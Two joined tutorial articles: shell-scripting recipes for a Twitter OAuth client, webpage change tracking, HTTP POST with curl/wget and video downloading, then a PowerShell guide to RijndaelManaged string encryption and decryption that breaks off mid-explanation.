Recently, Twitter stopped allowing people to log in by using plain HTTP authentication, so we must use OAuth to authenticate ourselves. Perform the following steps:

Download the bash-oauth library from https://github.com/livibetter/bash-oauth/archive/master.zip, and unzip it to any directory. Go to that directory and then inside the subdirectory bash-oauth-master, run make install-all as root. Go to https://apps.twitter.com/ and register a new app. This will make it possible to use OAuth. After registering the new app, go to your app's settings and change Access type to Read and Write. Now, go to the Details section of the app and note two things—Consumer Key and Consumer Secret—so that you can substitute these in the script we are going to write. Great, now let's write the script that uses this.

How to do it...
This Bash script uses the OAuth library to read tweets or send your own updates.

#!/bin/bash
#Filename: twitter.sh
#Description: Basic twitter client

oauth_consumer_key=YOUR_CONSUMER_KEY
oauth_consumer_secret=YOUR_CONSUMER_SECRET

config_file=~/.$oauth_consumer_key-$oauth_consumer_secret-rc

if [[ "$1" != "read" ]] && [[ "$1" != "tweet" ]]; then
  echo -e "Usage: $0 tweet status_message\n OR\n $0 read\n"
  exit -1;
fi

#source /usr/local/bin/TwitterOAuth.sh
source bash-oauth-master/TwitterOAuth.sh
TO_init

if [ ! -e $config_file ]; then
  TO_access_token_helper
  if (( $? == 0 )); then
    echo oauth_token=${TO_ret[0]} > $config_file
    echo oauth_token_secret=${TO_ret[1]} >> $config_file
  fi
fi

source $config_file

if [[ "$1" = "read" ]]; then
  TO_statuses_home_timeline '' 'YOUR_TWEET_NAME' '10'
  echo $TO_ret | sed 's/,"/\n/g' | sed 's/":/~/' | \
    awk -F~ '{} {if ($1 == "text") {txt=$2;} else if ($1 == "screen_name") printf("From: %s\n Tweet: %s\n\n", $2, txt);} {}' | \
    tr '"' ' '
elif [[ "$1" = "tweet" ]]; then
  shift
  TO_statuses_update '' "$@"
  echo 'Tweeted :)'
fi

Run the script as follows:

$ ./twitter.sh read
Please go to the following link to get the PIN: https://api.twitter.com/oauth/authorize?oauth_token=LONG_TOKEN_STRING
PIN: PIN_FROM_WEBSITE
Now you can create, edit and present Slides offline. - by A Googler
$ ./twitter.sh tweet "I am reading Packt Shell Scripting Cookbook"
Tweeted :)
$ ./twitter.sh read | head -2
From: Clif Flynt
Tweet: I am reading Packt Shell Scripting Cookbook

How it works...

First of all, we use the source command to include the TwitterOAuth.sh library, so we can use its functions to access Twitter. The TO_init function initializes the library. Every app needs to get an OAuth token and token secret the first time it is used. If these are not present, we use the library function TO_access_token_helper to acquire them. Once we have the tokens, we save them to a config file so we can simply source it the next time the script is run.
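The sed/awk pipeline in the read branch can be exercised offline on a small sample. The JSON below is a simplified, made-up tweet, the pipeline is lightly adapted for clarity, and GNU sed is assumed for `\n` in the replacement:

```shell
#!/bin/bash
# Simplified version of the read-branch pipeline: split JSON into
# key/value lines, mark the separator with ~, then report sender first.
extract_tweet() {
  sed 's/,"/\n/g' |              # one key/value pair per line
  sed 's/":/~/' |                # first ": on each line becomes ~
  awk -F~ '
    $1 ~ /text/        { txt = $2 }
    $1 ~ /screen_name/ { printf("From: %s Tweet: %s\n", $2, txt) }
  ' |
  tr -d '"{}'                    # strip leftover JSON punctuation
}

json='{"created_at":"Thu Nov 10 14:45:20 +0000 2016","text":"Hello world","screen_name":"Clif_Flynt"}'
echo "$json" | extract_tweet
```

This prints `From: Clif_Flynt Tweet: Hello world`, showing how the sender is reported before the saved tweet text.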
The library function TO_statuses_home_timeline fetches the tweets from Twitter. This data is returned as a single long string in JSON format, which starts like this:

[{"created_at":"Thu Nov 10 14:45:20 +0000 2016","id":7...9,"id_str":"7...9","text":"Dining...

Each tweet starts with the created_at tag and includes a text and a screen_name tag. The script will extract the text and screen name data and display only those fields. The script assigns the long string to the variable TO_ret. The JSON format uses quoted strings for the key and may or may not quote the value. The key/value pairs are separated by commas, and the key and value are separated by a colon :.

The first sed replaces each ," character set with a newline, making each key/value a separate line. These lines are piped to another sed command to replace each occurrence of ": with a tilde ~, which creates a line like:

screen_name~"Clif_Flynt"

The final awk script reads each line. The -F~ option splits the line into fields at the tilde, so $1 is the key and $2 is the value. The if command checks for text or screen_name. The text is first in the tweet, but it's easier to read if we report the sender first, so the script saves a text return until it sees a screen_name, then prints the current value of $2 and the saved value of the text.

The TO_statuses_update library function generates a tweet. The empty first parameter defines our message as being in the default format, and the message is a part of the second parameter.

Tracking changes to a website

Tracking website changes is useful to both web developers and users. Checking a website manually is impractical, but a change tracking script can be run at regular intervals. When a change occurs, it generates a notification.

Getting ready

Tracking changes in terms of Bash scripting means fetching websites at different times and taking the difference by using the diff command. We can use curl and diff to do this.

How to do it...
This bash script combines different commands, to track changes in a webpage:

#!/bin/bash
#Filename: change_track.sh
#Desc: Script to track changes to webpage

if [ $# -ne 1 ]; then
  echo -e "Usage: $0 URL\n"
  exit 1;
fi

first_time=0
# Not first time
if [ ! -e "last.html" ]; then
  first_time=1
  # Set it is first time run
fi

curl --silent $1 -o recent.html

if [ $first_time -ne 1 ]; then
  changes=$(diff -u last.html recent.html)
  if [ -n "$changes" ]; then
    echo -e "Changes:\n"
    echo "$changes"
  else
    echo -e "\nWebsite has no changes"
  fi
else
  echo "[First run] Archiving.."
fi

cp recent.html last.html

Let's look at the output of the track_changes.sh script on a website you control. First we'll see the output when a web page is unchanged, and then after making changes. Note that you should change MyWebSite.org to your website name.

First, run the following command:

$ ./track_changes.sh http://www.MyWebSite.org
[First run] Archiving..

Second, run the command again.

$ ./track_changes.sh http://www.MyWebSite.org
Website has no changes

Third, run the following command after making changes to the web page:

$ ./track_changes.sh http://www.MyWebSite.org
Changes:

--- last.html 2010-08-01 07:29:15.000000000 +0200
+++ recent.html 2010-08-01 07:29:43.000000000 +0200
@@ -1,3 +1,4 @@
+added line :)
data

How it works...

The script checks whether the script is running for the first time by using [ ! -e "last.html" ];. If last.html doesn't exist, it means that it is the first time and the webpage must be downloaded and saved as last.html. If it is not the first time, it downloads the new copy recent.html and checks the difference with the diff utility. Any changes will be displayed as diff output. Finally, recent.html is copied to last.html.

Note that changing the website you're checking will generate a huge diff file the first time you examine it. If you need to track multiple pages, you can create a folder for each website you intend to watch.
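The detection core of the script—capture diff output and test whether it is non-empty—can be tried on two local files standing in for the downloaded snapshots:

```shell
#!/bin/bash
# Core of the change tracker: diff two snapshots and report only
# when they differ (local temp files stand in for curl downloads).
last=$(mktemp)
recent=$(mktemp)
printf 'data\n' > "$last"
printf 'added line :)\ndata\n' > "$recent"

changes=$(diff -u "$last" "$recent")
if [ -n "$changes" ]; then
  echo "Changes detected"
else
  echo "Website has no changes"
fi
rm -f "$last" "$recent"
```

Because the snapshots differ by one line, this prints `Changes detected`; identical files would leave $changes empty and take the other branch.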
Posting to a web page and reading the response

POST and GET are two types of requests in HTTP to send information to, or retrieve information from, a website. In a GET request, we send parameters (name-value pairs) through the webpage URL itself. The POST command places the key/value pairs in the message body instead of the URL. POST is commonly used when submitting long forms or to conceal the information submitted from a casual glance.

Getting ready

For this recipe, we will use the sample guestbook website included in the tclhttpd package. You can download tclhttpd from http://sourceforge.net/projects/tclhttpd and then run it on your local system to create a local webserver. The guestbook page requests a name and URL which it adds to a guestbook to show who has visited a site when the user clicks the Add me to your guestbook button. This process can be automated with a single curl (or wget) command.

How to do it...

Download the tclhttpd package and cd to the bin folder. Start the tclhttpd daemon with this command:

tclsh httpd.tcl

The format to POST and read the HTML response from a generic website resembles this:

$ curl URL -d "postvar=postdata2&postvar2=postdata2"

Consider the following example:

$ curl http://127.0.0.1:8015/guestbook/newguest.html -d "name=Clif&url=www.noucorp.com&http=www.noucorp.com"

curl prints a response page like this:

<HTML>
<Head>
<title>Guestbook Registration Confirmed</title>
</Head>
<Body BGCOLOR=white TEXT=black>
<a href="www.noucorp.com">www.noucorp.com</a>
<DL>
<DT>Name
<DD>Clif
<DT>URL
<DD>
</DL>
www.noucorp.com
</Body>

-d is the argument used for posting. The string argument for -d is similar to the GET request semantics. var=value pairs are to be delimited by &. You can POST the data using wget by using --post-data "string". For example:

$ wget http://127.0.0.1:8015/guestbook/newguest.cgi --post-data "name=Clif&url=www.noucorp.com&http=www.noucorp.com" -O output.html

Use the same format as cURL for name-value pairs.
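Values that contain spaces, &, or other reserved characters must be URL-encoded before being placed in a -d string. A small bash helper can do this; the function below is an illustrative addition, not part of the recipe:

```shell
#!/bin/bash
# Percent-encode a string for safe use in a -d "key=value" POST body.
# Unreserved characters (letters, digits, . ~ _ -) pass through;
# everything else becomes %XX.
urlencode() {
  local s="$1" out="" c i
  for ((i = 0; i < ${#s}; i++)); do
    c=${s:i:1}
    case "$c" in
      [a-zA-Z0-9.~_-]) out+="$c" ;;
      *) out+=$(printf '%%%02X' "'$c") ;;  # "'x" yields the character code
    esac
  done
  printf '%s\n' "$out"
}

urlencode "Clif Flynt & co."
```

This prints `Clif%20Flynt%20%26%20co.`, which is safe to embed as `name=Clif%20Flynt%20%26%20co.` in a POST body. curl can also do this for you with its --data-urlencode option.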
The text in output.html is the same as that returned by the cURL command. The string to the post arguments (for example, to -d or --post-data) should always be given in quotes. If quotes are not used, & is interpreted by the shell to indicate that this should be a background process.

How it works...

If you look at the website source (use the View Source option from the web browser), you will see an HTML form defined, similar to the following code:

<form action="newguest.cgi" method="post">
<ul>
<li> Name: <input type="text" name="name" size="40">
<li> Url: <input type="text" name="url" size="40">
<input type="submit">
</ul>
</form>

Here, newguest.cgi is the target URL. When the user enters the details and clicks on the Submit button, the name and url inputs are sent to newguest.cgi as a POST request, and the response page is returned to the browser.

Downloading a video from the internet

There are many reasons for downloading a video. If you are on a metered service, you might want to download videos during off-hours when the rates are cheaper. You might want to watch videos where the bandwidth doesn't support streaming, or you might just want to make certain that you always have that video of cute cats to show your friends.

Getting ready

One program for downloading videos is youtube-dl. This is not included in most distributions and the repositories may not be up to date, so it's best to go to the youtube-dl main site: http://yt-dl.org

You'll find links and information on that page for downloading and installing youtube-dl.

How to do it…

Using youtube-dl is easy. Open your browser and find a video you like. Then copy/paste that URL to the youtube-dl command line.

youtube-dl https://www.youtube.com/watch?v=AJrsl3fHQ74

While youtube-dl is downloading the file, it will generate a status line on your terminal.

How it works…

The youtube-dl program works by sending a GET message to the server, just as a browser would do.
It masquerades as a browser so that YouTube or other video providers will download a video as if the device were streaming. The --list-formats (-F) option will list the formats in which a video is available, and the --format (-f) option will specify which format to download. This is useful if you want to download a higher-resolution video than your internet connection can reliably stream.

Summary

In this article we learned how to download and parse website data, send data to forms, and automate website-usage tasks and similar activities. We can automate many activities that we perform interactively through a browser with a few lines of scripting.

Resources for Article:

Further resources on this subject:

Linux Shell Scripting – various recipes to help you [article]
Linux Shell Script: Tips and Tricks [article]
Linux Shell Script: Monitoring Activities [article]
Packt
22 Jun 2017
21 min read

String Encryption and Decryption

In this article by Brenton J.W Blawat, author of the book Enterprise PowerShell Scripting Bootcamp, we will learn about string encryption and decryption. Large enterprises often have very strict security standards that are required by industry-specific regulations. When you are creating your Windows server scanning script, you will need to approach the script carefully with certain security concepts in mind. One of the most common situations you may encounter is the need to leverage sensitive data, such as credentials, in your script. While you could prompt for sensitive data during runtime, most enterprises want to automate the full script using zero-touch automation.

(For more resources related to this topic, see here.)

Zero-touch automation requires that the scripts are self-contained and have all of the required credentials and components to successfully run. The problem with incorporating sensitive data in the script, however, is that the data can be obtained in clear text. The usage of clear text passwords in scripts is a bad practice, and violates many regulatory and security standards. As a result, PowerShell scripters need a method to securely store and retrieve sensitive data for use in their scripts. One of the popular methods to secure sensitive data is to encrypt the sensitive strings. This article explores RijndaelManaged symmetric encryption, and how to use it to encrypt and decrypt strings using PowerShell.

In this article, we will cover the following topics:

Learn about RijndaelManaged symmetric encryption
Understand the salt, init, and password for the encryption algorithm
Script a method to create randomized salt, init, and password values
Encrypt and decrypt strings using RijndaelManaged encryption
Create an encoding and data separation security mechanism for encryption passwords

The examples in this article build upon each other. You will need to execute the scripts sequentially to have the final script in this article work properly.
RijndaelManaged encryption

When you are creating your scripts, it is best practice to leverage some sort of obfuscation or encryption for sensitive data. There are many different strategies that you can use to secure your data. One is leveraging string and script encoding. Encoding takes your human readable string or script, and scrambles it to make it more difficult for someone to see what the actual code is. The downsides of encoding are that you must decode the script to make changes to it, and that decoding does not require the use of a password or passphrase. Thus, someone can easily decode your sensitive data using the same method you would use to decode the script.

The alternative to encoding is leveraging an encryption algorithm. Encryption algorithms provide multiple mechanisms to secure your scripts and strings. While you can encrypt your entire script, encryption is most commonly used on the sensitive data in the scripts themselves, or in answer files. One of the most popular encryption algorithms to use with PowerShell is RijndaelManaged. RijndaelManaged is a symmetric block cipher algorithm, which was selected by the United States National Institute of Standards and Technology (NIST) for its implementation of the Advanced Encryption Standard (AES). When using RijndaelManaged for the standard of AES, it supports 128-bit, 192-bit, and 256-bit encryption.

In contrast to encoding, encryption algorithms require additional information to be able to properly encrypt and decrypt the string. When implementing RijndaelManaged in PowerShell, the algorithm requires salt, a password, and the Initialization Vector (IV). The salt is typically a randomized value that changes each time you leverage the encryption algorithm. The purpose of salt in a traditional encryption scenario is to change the encrypted value each time the encryption function is used. This is important in scenarios where you are encrypting multiple passwords or strings with the same value.
If two users are using the same password, the encryption value in the database would also be the same. By changing the salt each time, the passwords, though the same value, would have different encrypted values in the database. In this article, we will be leveraging a static salt value.

The password typically is a value that is manually entered by a user, or fed into the script using a parameter block. You can also derive the password value from a certificate, Active Directory attribute values, or a multitude of other sources. In this article, we will be leveraging three sources for the password.

The Initialization Vector (IV) is a hash generated from the IV string and is used for the encryption key. The IV string is also typically a randomized value that changes each time you leverage the encryption algorithm. The purpose of the IV string is to strengthen the hash created by the encryption algorithm. This was created to thwart a hacker who is leveraging a rainbow attack with hash tables precalculated using no IV strings, or commonly used strings. Since you are setting the IV string, the number of hash combinations exponentially increases and it reduces the effectiveness of a rainbow attack. In this article, we will be using a static initialization vector value.

The randomization of the salt and initialization vector strings becomes more important in scenarios where you are encrypting a large set of data. An attacker can intercept hundreds of thousands of packets, or strings, which reveal an increasing amount of information about your IV. With this, the attacker can guess the IV and derive the password. The most notable hack of IVs was with the Wired Equivalent Privacy (WEP) wireless protocol, which used a weak, or small, initialization vector. After capturing enough packets, an IV hash could be guessed and a hacker could easily obtain the passphrase used on the wireless network.
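The effect of the salt and the IV can be seen directly at the shell. Here OpenSSL's AES-256-CBC stands in for RijndaelManaged (AES is the standardized Rijndael); the salts, key, and IVs below are throwaway hex values for illustration only, and the -pbkdf2 flag assumes OpenSSL 1.1.1 or later:

```shell
#!/bin/bash
# Same plaintext and password, different salt -> different ciphertext;
# same key and plaintext, different IV -> different ciphertext.
plain="same secret string"

# Salt demo: password-based encryption with two different salts
s1=$(printf '%s' "$plain" | openssl enc -aes-256-cbc -pbkdf2 -pass pass:secret -S 0011223344556677 -base64)
s2=$(printf '%s' "$plain" | openssl enc -aes-256-cbc -pbkdf2 -pass pass:secret -S 8899aabbccddeeff -base64)

# IV demo: identical raw key, two different IVs (hex-dumped with od)
key=000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f
i1=$(printf '%s' "$plain" | openssl enc -aes-256-cbc -K "$key" -iv 000102030405060708090a0b0c0d0e0f | od -An -tx1 | tr -d ' \n')
i2=$(printf '%s' "$plain" | openssl enc -aes-256-cbc -K "$key" -iv f0e0d0c0b0a0908070605040302010ff | od -An -tx1 | tr -d ' \n')

[ "$s1" != "$s2" ] && echo "different salts: ciphertexts differ"
[ "$i1" != "$i2" ] && echo "different IVs: ciphertexts differ"
```

Both comparisons report a difference, which is exactly why varying the salt hides repeated passwords and why varying the IV frustrates precomputed-table attacks.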
Creating random salt, initialization vector, and passwords

As you are creating your scripts, you will want to make sure you use complex random values for the salt, IV string, and password. This is to prevent dictionary attacks, where an individual may use common passwords and phrases to guess the salt, IV string, and password. When you create your salt and IVs, make sure they are a minimum of 10 random characters each. It is also recommended that you use a minimum of 30 random characters for the password. To create random passwords in PowerShell, you can do the following:

Function create-password {
# Declare password variable outside of loop.
$password = ""
# For numbers between 33 and 126
For ($a=33;$a -le 126;$a++) {
# Add the Ascii text for the ascii number referenced.
$ascii += ,[char][byte]$a
}
# Generate a random character from the $ascii character set.
# Repeat 30 times, or create 30 random characters.
1..30 | ForEach { $password += $ascii | get-random }
# Return the password
return $password
}

# Create four 30 character passwords
create-password
create-password
create-password
create-password

The output of this command is four lines of 30 random characters each.

This function will create a string with 30 random characters for use with random password creation. You first start by declaring the create-password function. You then declare the $password variable for use within the function by setting it equal to "". The next step is creating a For loop to iterate through a set of numbers. These numbers represent ASCII character numbers that you can select from for the password. You then create the For loop by writing For ($a=33; $a -le 126; $a++). This means starting at the number 33, increase the value by one ($a++), and continue until the number is less than or equal to 126. You then declare the $ascii variable and construct the variable using the += assignment operator. As the For loop goes through its iterations, it adds a character to the array values.
The script then leverages the [char] or character value of the [byte] number contained in $a. After this section, the $ascii array will contain an array of all the ASCII characters with the byte values between 33 and 126. You then continue to the random character generation. You declare the 1..30 range, which means for numbers 1 to 30, repeat the following command. You pipe this to ForEach {, which executes the block once for each of the 30 iterations. You then call the $ascii array and pipe it to the get-random cmdlet. The get-random cmdlet will randomly select one of the characters in the $ascii array. This value is then joined to the existing values in the $password string using the assignment operator +=. After the 30 iterations, there will be 30 random values in the $password variable. Lastly, you leverage return $password to return this value to the script. After declaring the function, you call the function four times using create-password. This creates four random passwords for use.

To create strings that are less than 30 random characters in length, you can modify the 1..30 to be any value that you want. If you want a 15 random character salt and initialization vector, you would use 1..15 instead.
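A rough bash analogue of the create-password function draws 30 characters from the same printable ASCII range 33-126, here via /dev/urandom rather than get-random:

```shell
#!/bin/bash
# Bash sketch of the create-password idea: 30 random characters
# from the printable ASCII range 33-126 ('!' through '~').
create_password() {
  LC_ALL=C tr -dc '!-~' < /dev/urandom | head -c 30
  echo    # trailing newline for readability
}

pw=$(create_password)
echo "password: $pw"
echo "length: ${#pw}"
```

tr -dc deletes everything outside the '!' to '~' range, so head -c 30 keeps exactly 30 printable characters; shortening the count (head -c 15) gives the smaller salt and IV strings mentioned above.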
To import the System.Security Assembly with display information, you can do the following:

Write-host "Loading the .NET System.Security Assembly For Encryption"
Add-Type -AssemblyName System.Security -ErrorAction SilentlyContinue -ErrorVariable err
if ($err) {
Write-host "Error Importing the .NET System.Security Assembly."
PAUSE
EXIT
}
# if err is not set, it was successful.
if (!$err) {
Write-host "Successfully loaded the .NET System.Security Assembly For Encryption"
}

On success, this command prints the loading and success messages to the screen.

In this example, you successfully import the .NET System.Security Assembly for use with PowerShell. You first start by writing "Loading the .NET System.Security Assembly for Encryption" to the screen using the Write-host command. You then leverage the Add-Type cmdlet with the -AssemblyName parameter with the System.Security argument, the -ErrorAction parameter with the SilentlyContinue argument, and the -ErrorVariable parameter with the err argument. You then create an if statement to see if $err contains data. If it does, it will use the Write-host cmdlet to print "Error Importing the .NET System.Security Assembly." to the screen. It will PAUSE the script so the error can be read. Finally, it will exit the script. If $err is $null, designated by if (!$err) {, it will use the Write-host cmdlet to print "Successfully loaded the .NET System.Security Assembly for Encryption" to the screen. At this point, the script or PowerShell window is ready to leverage the System.Security Assembly.

After you load the System.Security Assembly, you can start creating the encryption function. The RijndaelManaged encryption requires a four-step process to encrypt the strings.

The RijndaelManaged encryption process is as follows:

The process starts by creating the encryptor. The encryptor is derived from the encryption key (password and salt) and initialization vector.
After you define the encryptor, you will need to create a new memory stream using the IO.MemoryStream object. A memory stream is what stores values in memory for use by the encryption assembly. Once the memory stream is open, you define a System.Security.Cryptography.CryptoStream object. The CryptoStream is the mechanism that uses the memory stream and the encryptor to transform the unencrypted data to encrypted data. In order to leverage the CryptoStream, you need to write data to the CryptoStream. The final step is to use the IO.StreamWriter object to write the unencrypted value into the CryptoStream. The output from this transformation is placed into the MemoryStream. To access the encrypted value, you read the data in the memory stream.

To learn more about the System.Security.Cryptography.RijndaelManaged class, you can view the following MSDN article: https://msdn.microsoft.com/en-us/library/system.security.cryptography.rijndaelmanaged(v=vs.110).aspx.

To create a script that encrypts strings using the RijndaelManaged encryption, you would perform the following:

Add-Type -AssemblyName System.Security

function Encrypt-String {
param($String, $Pass, $salt="CreateAUniqueSalt", $init="CreateAUniqueInit")
try {
$r = new-Object System.Security.Cryptography.RijndaelManaged
$pass = [Text.Encoding]::UTF8.GetBytes($pass)
$salt = [Text.Encoding]::UTF8.GetBytes($salt)
$init = [Text.Encoding]::UTF8.GetBytes($init)
$r.Key = (new-Object Security.Cryptography.PasswordDeriveBytes $pass, $salt, "SHA1", 50000).GetBytes(32)
$r.IV = (new-Object Security.Cryptography.SHA1Managed).ComputeHash($init)[0..15]
$c = $r.CreateEncryptor()
$ms = new-Object IO.MemoryStream
$cs = new-Object Security.Cryptography.CryptoStream $ms,$c,"Write"
$sw = new-Object IO.StreamWriter $cs
$sw.Write($String)
$sw.Close()
$cs.Close()
$ms.Close()
$r.Clear()
[byte[]]$result = $ms.ToArray()
}
catch {
$err = "Error Occurred Encrypting String: $_"
}
if($err) {
# Report Back Error
return $err
}
else {
return [Convert]::ToBase64String($result)
}
}

Encrypt-String "Encrypt This String" "A_Complex_Password_With_A_Lot_Of_Characters"

The output of this script is a single Base64-encoded ciphertext string.

This function displays how to encrypt a string leveraging the RijndaelManaged encryption algorithm. You first start by importing the System.Security assembly by leveraging the Add-Type cmdlet, using the -AssemblyName parameter with the System.Security argument. You then declare the function of Encrypt-String. You include a parameter block to accept and set values into the function. The first value is $string, which is the unencrypted text. The second value is $pass, which is used for the encryption key. The third is a predefined $salt variable set to "CreateAUniqueSalt". You then define the $init variable, which is set to "CreateAUniqueInit".

After the parameter block, you declare try { to handle any errors in the .NET assembly. The first step is to declare the encryption class using the new-Object cmdlet with the System.Security.Cryptography.RijndaelManaged argument. You place this object inside the $r variable. You then convert the $pass, $salt, and $init values to the character encoding standard of UTF8 and store the character byte values in a variable. This is done by specifying [Text.Encoding]::UTF8.GetBytes($pass) for the $pass variable, [Text.Encoding]::UTF8.GetBytes($salt) for the $salt variable, and [Text.Encoding]::UTF8.GetBytes($init) for the $init variable.

After setting the proper character encoding, you proceed to create the encryption key for the RijndaelManaged encryption algorithm. This is done by setting the RijndaelManaged $r.Key attribute to the object created by (new-Object Security.Cryptography.PasswordDeriveBytes $pass, $salt, "SHA1", 50000).GetBytes(32). This object leverages the Security.Cryptography.PasswordDeriveBytes class and creates a key using the $pass variable, $salt variable, "SHA1" hash name, and iterating the derivative 50000 times.
Each iteration of this class generates a different key value, making it more complex to guess the key. You then leverage the .GetBytes(32) method to return the 32-byte value of the key. The RijndaelManaged 256-bit encryption is a derivative of the 32 bytes in the key: 32 bytes times 8 bits per byte is 256 bits.

To create the initialization vector for the algorithm, you set the RijndaelManaged $r.IV attribute to the object created by (new-Object Security.Cryptography.SHA1Managed).ComputeHash($init)[0..15]. This section of the code leverages Security.Cryptography.SHA1Managed and computes the hash based on the $init value. When you invoke the [0..15] range operator, it will obtain the first 16 bytes of the hash and place it into the $r.IV attribute. The RijndaelManaged default block size for the initialization vector is 128 bits: 16 bytes times 8 bits per byte is 128 bits.

After setting up the required attributes, you are now ready to start encrypting data. You first start by leveraging the $r RijndaelManaged object with the $r.Key and $r.IV attributes defined. You use the $r.CreateEncryptor() method to generate the encryptor. Once you've generated the encryptor, you have to create a memory stream to do the encryption in memory. This is done by declaring the new-Object cmdlet, set to the IO.MemoryStream class, and placing the memory stream object in the $ms variable.

Next, you create the CryptoStream. The CryptoStream is used to transform the unencrypted data into the encrypted data. You first declare the new-Object cmdlet with the Security.Cryptography.CryptoStream argument. You also define the memory stream of $ms, the encryptor of $c, and the operator of "Write" to tell the class to write unencrypted data to the encryption stream in memory. After creating the CryptoStream, you are ready to write the unencrypted data into the CryptoStream. This is done using the IO.StreamWriter class.
You declare a new-Object cmdlet with the IO.StreamWriter argument, and define the CryptoStream of $cs for writing. Last, you take the unencrypted string stored in the $string variable, and pass it into the StreamWriter $sw with $sw.Write($String). The encrypted value is now stored in the memory stream. To stop the writing of data to the CryptoStream and MemoryStream, you close the StreamWriter with $sw.Close(), close the CryptoStream with $cs.Close(), and the memory stream with $ms.Close(). For security purposes, you also clear out the encryptor data by declaring $r.Clear(). After the encryption process is done, you will need to export the memory stream to a byte array. This is done by calling the $ms.ToArray() method and setting it to the $result variable with the [byte[]] data type. The contents are stored in a byte array in $result.

The next section of the code is where you declare your catch { statement. If there were any errors in the encryption process, the script will execute this section. You declare the variable of $err with the "Error Occurred Encrypting String: $_" argument. The $_ will be the pipeline error that occurred during the try {} section. You then create an if statement to determine whether there is data in the $err variable. If there is data in $err, it returns the error string to the script. If there were no errors, the script will enter the else { section of the script. It will convert the $result byte array to a Base64 string by leveraging [Convert]::ToBase64String($result). This converts the byte array to a string for use in your scripts.

After defining the encryption function, you call the function for use. You first start by calling Encrypt-String followed by "Encrypt This String". You also declare the second argument as the password for the encryptor, which is "A_Complex_Password_With_A_Lot_Of_Characters". After execution, this example receives the encrypted value of hK7GHaDD1FxknHu03TYAPxbFAAZeJ6KTSHlnSCPpJ7c= generated from the function.
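The overall password-derived encrypt/decrypt flow can be approximated at the shell with OpenSSL. This is an assumption-laden stand-in: AES-256-CBC with PBKDF2 key derivation at 50,000 iterations (OpenSSL 1.1.1+), mirroring the article's flow but not the exact PasswordDeriveBytes internals:

```shell
#!/bin/bash
# Round-trip sketch: derive a key from a password (PBKDF2, 50000
# iterations), encrypt a string, then decrypt it back.
pass="A_Complex_Password_With_A_Lot_Of_Characters"
plain="Encrypt This String"

enc=$(printf '%s' "$plain" |
  openssl enc -aes-256-cbc -pbkdf2 -iter 50000 -pass "pass:$pass" -base64)
dec=$(echo "$enc" |
  openssl enc -d -aes-256-cbc -pbkdf2 -iter 50000 -pass "pass:$pass" -base64)

echo "encrypted: $enc"
echo "decrypted: $dec"
```

The decrypted output matches the original plaintext only when the same password and iteration count are supplied, which is the same property the PowerShell Decrypt-String function depends on.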
Your results will vary depending on the salt, init, and password you use for the encryption algorithm.

Decrypting strings

The decryption of strings is very similar to the process you performed for encrypting strings. Instead of writing data to the memory stream, the function reads the data from the memory stream. Also, instead of using the .CreateEncryptor() method, the decryption process leverages the .CreateDecryptor() method. To create a script that decrypts strings encrypted with RijndaelManaged encryption, you would perform the following:

Add-Type -AssemblyName System.Security
function Decrypt-String {
    param($Encrypted, $pass, $salt="CreateAUniqueSalt", $init="CreateAUniqueInit")
    if($Encrypted -is [string]) {
        $Encrypted = [Convert]::FromBase64String($Encrypted)
    }
    $r = new-Object System.Security.Cryptography.RijndaelManaged
    $pass = [System.Text.Encoding]::UTF8.GetBytes($pass)
    $salt = [System.Text.Encoding]::UTF8.GetBytes($salt)
    $init = [Text.Encoding]::UTF8.GetBytes($init)
    $r.Key = (new-Object Security.Cryptography.PasswordDeriveBytes $pass, $salt, "SHA1", 50000).GetBytes(32)
    $r.IV = (new-Object Security.Cryptography.SHA1Managed).ComputeHash($init)[0..15]
    $d = $r.CreateDecryptor()
    $ms = new-Object IO.MemoryStream @(,$Encrypted)
    $cs = new-Object Security.Cryptography.CryptoStream $ms, $d, "Read"
    $sr = new-Object IO.StreamReader $cs
    try {
        $result = $sr.ReadToEnd()
        $sr.Close()
        $cs.Close()
        $ms.Close()
        $r.Clear()
        Return $result
    }
    Catch {
        Write-host "Error Occurred Decrypting String: Wrong String Used In Script."
    }
}
Decrypt-String "hK7GHaDD1FxknHu03TYAPxbFAAZeJ6KTSHlnSCPpJ7c=" "A_Complex_Password_With_A_Lot_Of_Characters"

The output of this script would look like the following:

This function displays how to decrypt a string leveraging the RijndaelManaged encryption algorithm. You first start by importing the System.Security assembly, leveraging the Add-Type cmdlet with the -AssemblyName parameter and the System.Security argument.
You then declare the Decrypt-String function. You include a parameter block to accept and set values for the function. The first value is $Encrypted, which is the encrypted text. The second value is $pass, which is used for the encryption key. The third is a predefined $salt variable set to "CreateAUniqueSalt". You then define the $init variable, which is set to "CreateAUniqueInit". After the parameter block, you check to see if the encrypted value is formatted as a string by using if ($Encrypted -is [string]) {. If this evaluates to True, you convert the string to bytes using [Convert]::FromBase64String($Encrypted), placing the decoded value in the $Encrypted variable. Next, you declare the decryption class using the new-Object cmdlet with the System.Security.Cryptography.RijndaelManaged argument. You place this object inside the $r variable. You then convert the $pass, $salt, and $init values to the character encoding standard of UTF8 and store the character byte values in a variable. This is done by specifying [Text.Encoding]::UTF8.GetBytes($pass) for the $pass variable, [Text.Encoding]::UTF8.GetBytes($salt) for the $salt variable, and [Text.Encoding]::UTF8.GetBytes($init) for the $init variable. After setting the proper character encoding, you proceed to create the encryption key for the RijndaelManaged encryption algorithm. This is done by setting the RijndaelManaged $r.Key attribute to the object created by (new-Object Security.Cryptography.PasswordDeriveBytes $pass, $salt, "SHA1", 50000).GetBytes(32). This object leverages the Security.Cryptography.PasswordDeriveBytes class and creates a key using the $pass variable, $salt variable, "SHA1" hash name, and iterating the derivative 50000 times. Each iteration of this class generates a different key value, making it more complex to guess the key. You then leverage the .GetBytes(32) method to return the 32-byte value of the key.
To create the initialization vector for the algorithm, you set the RijndaelManaged $r.IV attribute to the object created by (new-Object Security.Cryptography.SHA1Managed).ComputeHash($init)[0..15]. This section of the code leverages the Security.Cryptography.SHA1Managed class and computes the hash based on the $init value. When you invoke the [0..15] range operator, the first 16 bytes of the hash are obtained and placed into the $r.IV attribute. After setting up the required attributes, you are now ready to start decrypting data. You first start by leveraging the $r RijndaelManaged object with the $r.Key and $r.IV attributes defined. You use the $r.CreateDecryptor() method to generate the decryptor. Once you've generated the decryptor, you have to create a memory stream to do the decryption in memory. This is done by declaring the new-Object cmdlet with the IO.MemoryStream class argument. You then reference the $Encrypted values to place in the memory stream object with @(,$Encrypted), and store the populated memory stream in the $ms variable. Next, you create the CryptoStream, which is used to transform the encrypted data into the decrypted data. You first declare the new-Object cmdlet with the Security.Cryptography.CryptoStream class argument. You also define the memory stream of $ms, the decryptor of $d, and the operator of "Read" to 